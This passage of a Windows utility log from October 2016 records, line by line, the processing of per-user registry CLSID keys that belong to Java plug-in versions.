[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.238] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.239] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.240] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBB}]
